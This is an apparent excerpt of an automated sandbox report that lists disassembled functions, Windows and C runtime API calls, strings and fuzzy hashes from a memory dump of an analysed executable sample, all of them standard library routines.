                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 5e613a04cc141d2cd8e5048baf72f7bbae01902faf26e765c07f14e457c2fac4
                                                                        • Instruction ID: 4b7ba57b9ef0a01308dbeab42dc89110e1424fd68a88dcf77fea4b916f88bb24
                                                                        • Opcode Fuzzy Hash: 5e613a04cc141d2cd8e5048baf72f7bbae01902faf26e765c07f14e457c2fac4
                                                                        • Instruction Fuzzy Hash: 2901D2329006599BCB04EBB5DA456BE77B1AF80310F244509F4116B3D2DF34AE01CB90
                                                                        Function 00AE5C66 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE5C6D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE5C78
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE5CE6
                                                                          • Part of subcall function 00AE5DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AE5DE0
                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00AE5C93
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                        • String ID:
                                                                        • API String ID: 677527491-0
                                                                        • Opcode ID: dfae05c5f2ed11fd164ec6b7551f60a7b213622854b08c5d9f549d003f53054b
                                                                        • Instruction ID: 695458b1af982db88ecc732bbf32562bf52fa3b66b219f45c424a4701a650765
                                                                        • Opcode Fuzzy Hash: dfae05c5f2ed11fd164ec6b7551f60a7b213622854b08c5d9f549d003f53054b
                                                                        • Instruction Fuzzy Hash: 2601BC75E00A908BCB05EB71E9459BD7BA1BF85700B684009E92157381CF74AA02CBC1
                                                                        Function 00B18C76 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00B18643,?,00000001,?,?,?,00B17788,?,?,00000000), ref: 00B18C8D
                                                                        • GetLastError.KERNEL32(?,00B18643,?,00000001,?,?,?,00B17788,?,?,00000000,?,?,?,00B17D0F,?), ref: 00B18C99
                                                                          • Part of subcall function 00B18C5F: CloseHandle.KERNEL32(FFFFFFFE,00B18CA9,?,00B18643,?,00000001,?,?,?,00B17788,?,?,00000000,?,?), ref: 00B18C6F
                                                                        • ___initconout.LIBCMT ref: 00B18CA9
                                                                          • Part of subcall function 00B18C21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B18C50,00B18630,?,?,00B17788,?,?,00000000,?), ref: 00B18C34
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00B18643,?,00000001,?,?,?,00B17788,?,?,00000000,?), ref: 00B18CBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: 61b75ea86dfcb7ae3900dbdff1c11baccdc28c07df6e09d38938e114f6d23f19
                                                                        • Instruction ID: 53ac3dc0ac3ac000f85c3f813befbbd49571753c6c0cca020d3debbbf1f660ce
                                                                        • Opcode Fuzzy Hash: 61b75ea86dfcb7ae3900dbdff1c11baccdc28c07df6e09d38938e114f6d23f19
                                                                        • Instruction Fuzzy Hash: 9AF0F236101159BBCF222F959C08DCE3FA6FF097B0F918450FA1996220DE32D960ABA0
                                                                        Function 00AF78FD Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SleepConditionVariableCS.KERNELBASE(?,00AF789A,00000064), ref: 00AF7920
                                                                        • LeaveCriticalSection.KERNEL32(00B34AF8,?,?,00AF789A,00000064,?,?,00AD25B6,00B3571C,B7207CF4,?,00000000,00B193ED,000000FF,?,00AD1A26), ref: 00AF792A
                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00AF789A,00000064,?,?,00AD25B6,00B3571C,B7207CF4,?,00000000,00B193ED,000000FF,?,00AD1A26), ref: 00AF793B
                                                                        • EnterCriticalSection.KERNEL32(00B34AF8,?,00AF789A,00000064,?,?,00AD25B6,00B3571C,B7207CF4,?,00000000,00B193ED,000000FF,?,00AD1A26), ref: 00AF7942
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                        • String ID:
                                                                        • API String ID: 3269011525-0
                                                                        • Opcode ID: eb01392445f38120a0eedbd218f6f7561d7b6416f6e92113c6cc6f7307b330cb
                                                                        • Instruction ID: f8b0e10845da20a175f8c3c541d8d1c3fa4323b0bc7381af33d82ff764fd2240
                                                                        • Opcode Fuzzy Hash: eb01392445f38120a0eedbd218f6f7561d7b6416f6e92113c6cc6f7307b330cb
                                                                        • Instruction Fuzzy Hash: 68E01232985135B7C7116B90EC09AED7F64EB09751F518055F91567170CFB16C109BD8
                                                                        Function 00B0709D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00B0712D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__start
                                                                        • String ID: pow
                                                                        • API String ID: 3213639722-2276729525
                                                                        • Opcode ID: f10d17068928157a6460bfbc0e8d1c54d0bc9dddc55832f19401576581f58884
                                                                        • Instruction ID: 13ec90fa9f4e2ca2009d4f3ec98269cb8e7b6668187b6ff3e449bc1c9bdc0ad2
                                                                        • Opcode Fuzzy Hash: f10d17068928157a6460bfbc0e8d1c54d0bc9dddc55832f19401576581f58884
                                                                        • Instruction Fuzzy Hash: BD514971F4C207A6CB35B718C94137AAFE0EB40700F248DF9F095926E9EE34DC969A42
                                                                        Function 00AF6C34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldiv
                                                                        • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                        • API String ID: 3732870572-1956417402
                                                                        • Opcode ID: f1e31ecc10935b515b44a2fb70cf7da30d642d06abc0b71bc2a3c952b3f107ac
                                                                        • Instruction ID: 371d1a247a037f3e94adfdc220bfe5eb78a9e3db3c8f3e5b3fce2b8157197d98
                                                                        • Opcode Fuzzy Hash: f1e31ecc10935b515b44a2fb70cf7da30d642d06abc0b71bc2a3c952b3f107ac
                                                                        • Instruction Fuzzy Hash: E851F370B0465C5BDF298FED88917BEBBFAAF59710F14406AFAD1D7241C27489428BA0
                                                                        Function 00ADF860 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00ADFA3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task
                                                                        • String ID: false$true
                                                                        • API String ID: 118556049-2658103896
                                                                        • Opcode ID: 46d0773d636d2f4af2793f752f5253f89763ff24115940e4685c7127cbf9b664
                                                                        • Instruction ID: b438ba856f28baab55bdb3ad3045101de5699e601d0e93d85d33df91855e150a
                                                                        • Opcode Fuzzy Hash: 46d0773d636d2f4af2793f752f5253f89763ff24115940e4685c7127cbf9b664
                                                                        • Instruction Fuzzy Hash: 5A5194B1D003489FDB10DFA4C941BEEBBF8FF05314F14826AE946AB281E775AA45CB51
                                                                        Function 00AF22AA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF22B1
                                                                        • _swprintf.LIBCMT ref: 00AF2329
                                                                          • Part of subcall function 00AE780A: __EH_prolog3.LIBCMT ref: 00AE7811
                                                                          • Part of subcall function 00AE780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AE781B
                                                                          • Part of subcall function 00AE780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE788C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 2348759532-1402515088
                                                                        • Opcode ID: 13f79bebbc3b6ad707fa2adca2a5e1ba4083c0fd2ec618016c729f6529bfa793
                                                                        • Instruction ID: 36d123e0f5a9d5e3288f7c33120e3f863a43650cfa60817848c1dd4e30009e6c
                                                                        • Opcode Fuzzy Hash: 13f79bebbc3b6ad707fa2adca2a5e1ba4083c0fd2ec618016c729f6529bfa793
                                                                        • Instruction Fuzzy Hash: 17515A71D00249ABCF05DFE4D945AEDBBB9FF08300F20855AF516AB295EB349945CF90
                                                                        Function 00AF258E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF2595
                                                                        • _swprintf.LIBCMT ref: 00AF260D
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB52D
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB550
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB578
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 1487807907-1402515088
                                                                        • Opcode ID: 1a0cfb47dbe9daadc740e1d4ec3c9aaf3857d456d2d7f659ec731083bdb9219f
                                                                        • Instruction ID: 7818466c37946b0f040248146cc34ebed701c74b50e66d96556c5d4b9e20d499
                                                                        • Opcode Fuzzy Hash: 1a0cfb47dbe9daadc740e1d4ec3c9aaf3857d456d2d7f659ec731083bdb9219f
                                                                        • Instruction Fuzzy Hash: 53515A71D00209ABCF05DFE4D955AEDBBB9FF08300F20841AF942AB295EB349945CF90
                                                                        Function 00AF6607 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF660E
                                                                        • _swprintf.LIBCMT ref: 00AF6686
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5BD
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5E0
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC608
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC6A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 1487807907-1402515088
                                                                        • Opcode ID: 161d1cdd6ff96f43c68ece1eb2eefd072ea8c5ab5bdf1132248000f8f7528875
                                                                        • Instruction ID: d524736da21260c054ebfba17532b59672baff884ddbab330bcf23adead447cb
                                                                        • Opcode Fuzzy Hash: 161d1cdd6ff96f43c68ece1eb2eefd072ea8c5ab5bdf1132248000f8f7528875
                                                                        • Instruction Fuzzy Hash: AA514A71D0020DABCF09DFE4D985AEDBBB5FF08300F20851AF516AB2A5EB359955CB50
                                                                        Function 00AD9620 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \\?\$\\?\UNC\
                                                                        • API String ID: 0-3019864461
                                                                        • Opcode ID: b251d1f16f524c0242676a55e585c15166d4ba5853a1bce348acc022ebc21f78
                                                                        • Instruction ID: 9fc5140c2816a88f72953ea7f9c63d7eeecd78ea43da0410158ed7a63b0944e3
                                                                        • Opcode Fuzzy Hash: b251d1f16f524c0242676a55e585c15166d4ba5853a1bce348acc022ebc21f78
                                                                        • Instruction Fuzzy Hash: 1A519E70A102049BDB24CF65D995BEEBBF5FF99314F10461EE802A7390DB75EA84CB90
                                                                        Function 00AFB5D1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,?), ref: 00AFB5F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: EncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 2118026453-2084237596
                                                                        • Opcode ID: 7d5e3c75f32bfa7d62e7d910164b4b42239af8c3e1ac036fbcb27048a60ff541
                                                                        • Instruction ID: 01aafc5e7ab231cc32c7bf7e945dc1dccdab9aa309314b0afddec7061570b599
                                                                        • Opcode Fuzzy Hash: 7d5e3c75f32bfa7d62e7d910164b4b42239af8c3e1ac036fbcb27048a60ff541
                                                                        • Instruction Fuzzy Hash: C541467190020DAFCF15DF98CD81AFEBBB5BF48304F198199FA04A6261D7359960DB64
                                                                        Function 00AF217C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF2183
                                                                          • Part of subcall function 00AE780A: __EH_prolog3.LIBCMT ref: 00AE7811
                                                                          • Part of subcall function 00AE780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AE781B
                                                                          • Part of subcall function 00AE780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE788C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                        • String ID: %.0Lf$0123456789-
                                                                        • API String ID: 2728201062-3094241602
                                                                        • Opcode ID: 590d026ca1d5c6a4bf816bada1b574f4a13eb5c4cd39ecb83a4c9ba6ffa73998
                                                                        • Instruction ID: 3ae8f0fb633850bec448c43b89ec5f5a061fcb71d76b30989efdae190735dd2a
                                                                        • Opcode Fuzzy Hash: 590d026ca1d5c6a4bf816bada1b574f4a13eb5c4cd39ecb83a4c9ba6ffa73998
                                                                        • Instruction Fuzzy Hash: 8F413831900219DFCF15EFD8C981AEDBBB5FF08310F54016AF912AB261DB349956CB95
                                                                        Function 00AF64DB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF64E2
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5BD
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5E0
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC608
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC6A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                        • String ID: 0123456789-$0123456789-
                                                                        • API String ID: 2088892359-2494171821
                                                                        • Opcode ID: 58847d7b6a021d3e066365209abde870cb49260bb6fe17d2950cfe17814aa4a6
                                                                        • Instruction ID: 5adcc8d1c1aa9f848a673fe1cd248bdaf778cceaee8b78ea1851d3e52c0aa407
                                                                        • Opcode Fuzzy Hash: 58847d7b6a021d3e066365209abde870cb49260bb6fe17d2950cfe17814aa4a6
                                                                        • Instruction Fuzzy Hash: DE413A3190020DAFCF05DFE4D9919EE7BB5AF08310B10405AF922A7265DB35AA55CB55
                                                                        Function 00AF2460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF2467
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB52D
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB550
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB578
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                        • String ID: 0123456789-$0123456789-
                                                                        • API String ID: 2088892359-2494171821
                                                                        • Opcode ID: 9c45a5ae88bb0c5d5d4f333b7ee4e73c5954aef338df6984e5891578d6db9413
                                                                        • Instruction ID: a8c4faaa6e1867d8c6aad9b593458ebb1566784c927cf565ec8cef0821be3f29
                                                                        • Opcode Fuzzy Hash: 9c45a5ae88bb0c5d5d4f333b7ee4e73c5954aef338df6984e5891578d6db9413
                                                                        • Instruction Fuzzy Hash: 9C41473190021CDFCF05DFE8D9919EDBBB5BF08310F50016AF916AB251DB349A55CB65
                                                                        Function 00AF67B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3___cftoe
                                                                        • String ID: !%x
                                                                        • API String ID: 855520168-1893981228
                                                                        • Opcode ID: 0ff4069eeba2e88a1a54991f7707081393aa4c470c8e39711ce66f310cb47e48
                                                                        • Instruction ID: c5e57bb084a298c66cb812ea78e2d3b1d20f0e33a036e5d8ce52988c5d4bd277
                                                                        • Opcode Fuzzy Hash: 0ff4069eeba2e88a1a54991f7707081393aa4c470c8e39711ce66f310cb47e48
                                                                        • Instruction Fuzzy Hash: AB410370A1124DEFDF04DFE8D841AEEBBB1BF08340F044429FA55AB252D734AA05CBA1
                                                                        Function 00AF2DB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
